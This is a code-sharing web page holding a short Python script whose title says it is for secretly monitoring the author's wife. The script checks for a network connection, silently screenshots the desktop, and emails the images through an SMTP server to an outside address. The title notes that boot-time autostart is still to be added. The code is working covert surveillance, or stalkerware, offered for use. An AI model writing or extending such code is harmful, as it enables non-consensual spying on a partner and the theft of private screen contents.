代码语言
.
CSharp
.
JS
Java
Asp.Net
C
MSSQL
PHP
Css
PLSQL
Python
Shell
EBS
ASP
Perl
ObjC
VB.Net
VBS
MYSQL
GO
Delphi
AS
DB2
Domino
Rails
ActionScript
Scala
代码分类
文件
系统
字符串
数据库
网络相关
图形/GUI
多媒体
算法
游戏
Jquery
Extjs
Android
HTML5
菜单
网页交互
WinForm
控件
企业应用
安全与加密
脚本/批处理
开放平台
其它
【
Python
】
监控媳妇,还没做开机启动
作者:
talentwang
/ 发布于
2012/5/26
/
900
import os import socket import smtplib import time import mimetypes from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.mime.image import MIMEImage import PIL from PIL import Image,ImageGrab</div> <div>def getip(): localip = socket.gethostbyname(socket.gethostname()) msg = MIMEMultipart() msg['From']="<a href="mailto:from@qq.com">from@qq.com</a>" msg['To']="<a href="mailto:to@126.com">to@126.com</a>" msg['Subject']= "email for testing"</div> <div> txt = MIMEText("this is content of email ") msg.attach(txt) im = ImageGrab.grab() im.save("d:\sketch.png") fileName = "d:\sketch.png" ctype,encoding = mimetypes.guess_type(fileName) if ctype is None or encoding is not None: ctype = "application/octet-stream" maintype,subtype = ctype.split('/',1) att1 = MIMEImage((lambda f: (f.read(), f.close()))(open(fileName, 'rb'))[0], _subtype = subtype) att1.add_header('Content-Disposition','attachment',filename=fileName) msg.attach(att1) smtp = smtplib.SMTP() smtp.connect("smtp.qq.com","25") smtp.login("<a href="mailto:from@qq.com","password">from@qq.com","password</a>") smtp.sendmail("<a href="mailto:from@qq.com","to@126.com",msg.as_string">from@qq.com","to@126.com",msg.as_string</a>()) smtp.quit()</div> <div>def test2(): import os import subprocess fnull = open(os.devnull, 'w') return1 = subprocess.call('ping 8.8.8.8', shell = True, stdout = fnull, stderr = fnull) fnull.close() if return1: return False else: getip() return True i=0 while 1: t = test2() if t == False: time.sleep(30) else: time.sleep(3) i=i+1 if i==3: break </div> <div></div>
试试其它关键字
同语言下
.
比较两个图片的相似度
.
过urllib2获取带有中文参数的url内容
.
不下载获取远程图片的宽度和高度及文件大小
.
通过qrcode库生成二维码
.
通过httplib发送GET和POST请求
.
Django下解决小文件下载
.
遍历windows的所有窗口并输出窗口标题
.
根据窗口标题调用窗口
.
python 抓取搜狗指定公众号
.
pandas读取指定列
可能有用的
.
比较两个图片的相似度
.
过urllib2获取带有中文参数的url内容
.
不下载获取远程图片的宽度和高度及文件大小
.
通过qrcode库生成二维码
.
通过httplib发送GET和POST请求
.
Django下解决小文件下载
.
遍历windows的所有窗口并输出窗口标题
.
根据窗口标题调用窗口
.
python 抓取搜狗指定公众号
.
pandas读取指定列
talentwang
贡献的其它代码
(
1
)
.
监控媳妇,还没做开机启动
Copyright © 2004 - 2024 dezai.cn. All Rights Reserved
站长博客
粤ICP备13059550号-3